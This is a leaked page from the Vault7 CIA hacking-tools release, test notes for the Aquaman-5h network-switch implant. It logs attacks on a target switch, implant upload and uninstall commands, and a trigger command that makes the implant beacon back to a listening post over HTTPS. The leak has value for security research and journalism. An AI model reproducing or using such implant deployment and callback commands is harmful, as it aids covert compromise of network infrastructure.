Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Owner: User #71467
Aquaman-5h-Without-Snooping Test Notes
Xetron redelivered Aquaman-5h without snooping as an interim solution to EAREnterprise Archive 5244. Plan is to run through Smoke tests from previous Aquaman-5h testing, as well as verify that the bug from EAREnterprise Archive 5244 is not reproducible.
Progress / Notes
- Run through HG Base Smoke Tests
- Install/Uninstall without leave-behind
- Establish baseline values for clean target device - skipped because we already have that data from previous testing
- IAC attack - successful, received codes were 125, 60, 159 which are in the readme
- Edited target-aliases to use target address 172.31.255.14
- Edited target-aliases to use correct proc_id
- HG upload - hg_start, left 1s delay between packets
- HG uploaded successfully - result good
- Establish CTCounter Terrorism Session with HG according to readme
- Edit Aquaman-5h.txt hostfile - set listening interface of flux node to eth0 and IP to trigger to 192.168.21.10 (Seeds host)
- Ran ./prep-ct.sh
- Started CutThroat ./cutthroat ilm_hg.so - listening on 443 and trigger windows
- Trigger implant - beacon call_base_back https 172.20.12.22 443 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4
- 0011.bb89.21c4 is MACApple Operating System address of 192.168.21.1
- Successful HG comms
- Uninstall according to readme
- device uninstall_hg -mp -f - Successful
- Memory back down, no syslog messages, no crash
- Install/Uninstall with leave-behind
- Reloaded switch to start with a clean switch
- SSHIAC attack - successful, received codes were in readme
- HG upload - hg_start_leave_behiind - delay of 1s delay between packets - Successful
- Collected a show tech
- Establish CTCounter Terrorism Session with HG according to readme
- Started CutThroat ./cutthroat ilm_hg.so - listening on 443 and trigger windows
- Trigger implant - beacon call_base_back https 172.20.12.22 443 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4
- 0011.bb89.21c4 is MACApple Operating System address of 192.168.21.1
- Successful HG comms
- Uninstall according to readme - successful, no anamolies seen
- Did Broad on remote - ok
- hg_start to reinstall
- While hg was reinstalling, i typed show stacks on switch - 1s later the switch crashed with the following error:
Instruction Access Exception (0x0400)!
Not sure if this was related to entering show stacks whlie hg reinstall taking place or if that was a coincidence
- While hg was reinstalling, i typed show stacks on switch - 1s later the switch crashed with the following error:
- Attempt to reproduce the crash
- SSHIAC attack
- Changed interpacket time to 0.1s
- hg_start_leave_behind - successful
- Establish CTCounter Terrorism Session
- Uninstall according to readme - successful, no anamolies seen
- hg_start to reinstall
- No show commands entered - successful reinstall
- Uninstall hg - successful
- hg_start to reinsall
- this time, enter show stacks during install